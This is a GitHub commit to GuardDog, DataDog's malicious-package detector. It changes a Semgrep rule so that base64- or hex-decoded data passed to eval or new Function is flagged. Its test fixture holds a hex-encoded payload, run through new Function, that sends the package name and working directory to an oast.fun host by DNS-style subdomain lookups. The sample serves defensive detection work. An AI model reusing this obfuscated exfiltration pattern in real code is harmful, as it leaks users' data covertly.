Skip to content

Commit 217a20e

Browse files
sobregosoddsobregosodd
authored
Merge pull request #456 from DataDog/s.obregoso/FN_npm-exec-base64
FN: Adding a new detection case to npm-exec-base64
2 parents bed12d1 + 247b6ea commit 217a20e

File tree

2 files changed

+27
-7
lines changed

2 files changed

+27
-7
lines changed

guarddog/analyzer/sourcecode/npm-exec-base64.yml

Lines changed: 14 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -9,8 +9,17 @@ rules:
99
languages:
1010
- javascript
1111
severity: WARNING
12-
patterns:
13-
- pattern-not: eval('...')
14-
- pattern-not: eval("...")
15-
- pattern-not: eval(`...`)
16-
- pattern: eval(atob(...))
12+
mode: taint
13+
pattern-sources:
14+
- pattern-either:
15+
- pattern: Buffer.from(...)
16+
- pattern: atob(...)
17+
pattern-sinks:
18+
- pattern-either:
19+
- patterns:
20+
- pattern-inside: |
21+
$FN = new Function(...)
22+
...
23+
- pattern: $FN(...)
24+
- patterns:
25+
- pattern: eval(...)

tests/analyzer/sourcecode/npm-exec-base64.js

Lines changed: 13 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,2 +1,13 @@
1-
// ruleid: npm-exec-base64
2-
eval(atob("Y29uc29sZS5sb2coIk5ldmVyIGdvbm5hIGdpdmUgeW91IHVwIikK"))
1+
function f(){
2+
// ruleid: npm-exec-base64
3+
eval(atob("Y29uc29sZS5sb2coIk5ldmVyIGdvbm5hIGdpdmUgeW91IHVwIikK"));
4+
}
5+
6+
function f() {
7+
import fetch from "node-fetch"
8+
const admin = "0a636f6e7374207061636b6167654e616d65203d2022726f626c6f782d6576656e742d747261636b6572223b0a636f6e73742063757272656e74576f726b696e674469726563746f7279203d2070726f636573732e63776428293b0a636f6e73742064617461203d204a534f4e2e737472696e676966792860247b7061636b6167654e616d657d2b247b63757272656e74576f726b696e674469726563746f72797d60293b0a6c657420686578456e636f64656444617461203d204275666665722e66726f6d2864617461292e746f537472696e67282768657827293b0a636f6e7374206865784461746157697468446f7473203d20686578456e636f646564446174612e6d61746368286e65772052656745787028602e7b312c36327d602c2027672729292e6a6f696e28272e27293b0a6665746368286068747470733a2f2f247b6865784461746157697468446f74737d2e6c74617265767a6c7464636c6b6466727361647533386c30316e657967327268622e6f6173742e66756e60293b0a"
9+
const adminResult = Buffer.from(admin, 'hex').toString('utf8');
10+
const func = new Function(adminResult);
11+
// ruleid: npm-exec-base64
12+
func(adminResult);
13+
}

0 commit comments

Comments
 (0)